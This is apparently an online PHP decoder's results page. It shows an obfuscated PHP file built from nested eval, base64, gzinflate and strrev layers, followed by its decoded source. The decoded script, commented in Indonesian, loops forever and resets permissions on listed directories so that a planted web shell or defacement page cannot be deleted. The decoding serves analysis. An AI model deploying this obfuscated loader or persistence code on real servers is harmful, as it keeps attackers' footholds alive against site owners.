Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $enc = '=IWlkfc22I2D/cs2xdM92vQEOJ4M754/W3DaNBdETz815yGwmL5zQkVitC1hyDOG/EnDlXrhhTT..
Decoded Output download
?>b'<?php
/**
* SCRIPT INI DI BUAT OLEH Eclipse Security Labs Team
* Digunakan untuk memastikan keamanan file/folder landing page atau shell terkunci [ tidak bisa terhapus. ]
*/
set_time_limit(0);
$expectedPerms = \'0555\';
$interval = 1;
$jsonFilePath = \'./config.json\';
function getPathsFromJson($jsonFilePath) {
if (!file_exists($jsonFilePath)) {
echo "File config json nya ga ada cok $jsonFilePath
";
return [];
}
$jsonContent = file_get_contents($jsonFilePath);
$data = json_decode($jsonContent, true);
if (json_last_error() !== JSON_ERROR_NONE) {
echo "Error: format nya benerin dulu - " . json_last_error_msg() . "
";
return [];
}
return isset($data[\'path\']) && is_array($data[\'path\']) ? $data[\'path\'] : [];
}
function restorePermissions($dir, $expectedPerms) {
if (!is_dir($dir)) {
echo "Error: $dir bukan direktori.
";
return;
}
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
$path = $file->getPathname();
$currentPerms = substr(sprintf(\'%o\', $file->getPerms()), -4);
if ($currentPerms !== $expectedPerms) {
if (chmod($path, octdec($expectedPerms))) {
echo "Ada Yang mau tikung ni, udah gue ubah $path dari $currentPerms ke $expectedPerms
";
} else {
echo "gagal cok $path
";
}
}
}
}
while (true) {
$dirsToMonitor = getPathsFromJson($jsonFilePath);
if (empty($dirsToMonitor)) {
echo "directory nya mana anjir.
";
break;
}
foreach ($dirsToMonitor as $dir) {
restorePermissions($dir, $expectedPerms);
}
sleep($interval);
}'
Did this file decode correctly?
Original Code
<?php
$enc = '=IWlkfc22I2D/cs2xdM92vQEOJ4M754/W3DaNBdETz815yGwmL5zQkVitC1hyDOG/EnDlXrhhTTNYr7aVgpVg96YoZxPlLqoXWi/5hu+7wNb/IXsH6Wx+BjcHfsaZrhmt/HFnLnxtFh4g08n8SrpA4qSpZyxrA2mVjWlIXU3QhuLBbBRxQuNHIKl0Rr0S/AaMbz0N6/8JBXCulxf5l5aQ0MDPAi9JXJky7MIjW3sm6HnypraNH3uuyLnew78YgTfV3u3FdfWsoc8FMNFttgt9yU3EVUAoQXvazLynJZi94m8zJlzaKanBFXtxf8QcZfbwGzBRufUGvB4vaDdRPs+Zg7PJExsbbt38+cm98XrRfe2zPvi2w8GKR/Sco4qB0zXkWgga6uBf26s55rWRTM/aB6NTVA/KZgpEYOvBJX14qy7o7IKMdyQjUXhGeqE+CLa7GYKEiHokq58mMY1KoxVClk3FhO6XZC1o4SNPe9KODghH2rVVznU5ePJHd0B96O4o2y13ZlVRQM0FumDou0z4Dn+BQEdPzd5hSfIAzZLNFaCJEFKXIoyuJjrldoPHOQzHBW8Tec9yQX6DufG2kG8XcxBHgprUh6+eUqNlUaboTXWGdQquzKi5ZQI5PNug0BSON+aOZnoU9hvUaTZRBl0pOVlxl2Vr6xyftLuJZFNo0Bbf/gL4jDaTkYOPMAiHWBysgjKqM4pDdIODeQuCvXB6aDhf8hRueAYLFB6UaK/eYrGJj0nnV5QSfgGRkgcj8QKsklwdWfELdJIT3Pgs30y0VWIL35D3z9rESp8+5VSIMtrzO7sL7Og4mWlFxLMgBGU4rz92/meeNcCROF9yMCfoZtMqf3CDytPqL88a4k5EySCkLCM7AYgVmIVYkipxA9WGCuQ8QREQG6lpUAR0MvLemCFwmuLYIUQ4Y01ZYIQbqhVJAnnKh8idppV5xxwChvbKwcJYhhZREaRIBiw+wA3YO3lveYweg7IGzYObPqpuycMB/+7f4Rnv3+7szVR3vd8Z682Zyc9izvCTyWa7kVn/DVjCYvt9G7eTgt2KXZAhXiUKRARaTFFp0nEKk2VZFqVY+H1v2HEANtbbXVjciH/GPQOBwJe8v7AEFA/2OQSBwfsD4UA';
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
?>
Function Calls
strrev | 1 |
gzinflate | 3 |
gzuncompress | 2 |
base64_decode | 3 |
Stats
MD5 | 6334b037c24056d47bb1728932f171c6 |
Eval Count | 2 |
Decode Time | 89 ms |